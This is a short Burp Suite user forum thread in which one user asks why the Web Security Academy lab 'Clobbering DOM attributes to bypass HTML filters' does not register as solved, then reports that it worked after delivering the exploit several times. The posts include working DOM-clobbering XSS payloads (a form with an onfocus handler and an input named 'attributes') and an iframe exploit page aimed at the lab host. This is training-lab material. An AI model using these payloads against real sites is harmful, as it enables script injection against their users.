Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Lab "Clobbering DOM attributes to bypass HTML filters" is not getting solved

Aakash | Last updated: Oct 08, 2024 08:04PM UTC

Below exploit is working for myself and getting the popup but when delivering this to victim then lab is not getting solved. Payload: <form id=x tabindex=1 onfocus=alert(1)><input id=attributes></form> EXPLOIT: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Clobbering DOM attributes to bypass HTML filters</title> </head> <body> <iframe src="https://0a64002f04d904d28395199f00e400de.web-security-academy.net/post?postId=9" onload="setTimeout(()=>this.src=this.src+'#x',5000)"> </body> </html>

Aakash | Last updated: Oct 08, 2024 08:05PM UTC

Also, tried 500ms, 1000ms upto 5000ms. Same issue

Aakash | Last updated: Oct 08, 2024 08:35PM UTC

Also, tried with below payload and exploit: Payload: <form id=x tabindex=1 onfocus=print()><input id=attributes></form> Exploit: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Clobbering DOM attributes to bypass HTML filters</title> </head> <body> <iframe src="https://0a64002f04d904d28395199f00e400de.web-security-academy.net/post?postId=7" onload="setTimeout(()=>{ this.src=this.src+'#x'; },1000)"></iframe> </body> </html>

Aakash | Last updated: Oct 08, 2024 08:39PM UTC

It has been solved after multiple "Deliver exploit to victim". Thanks

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.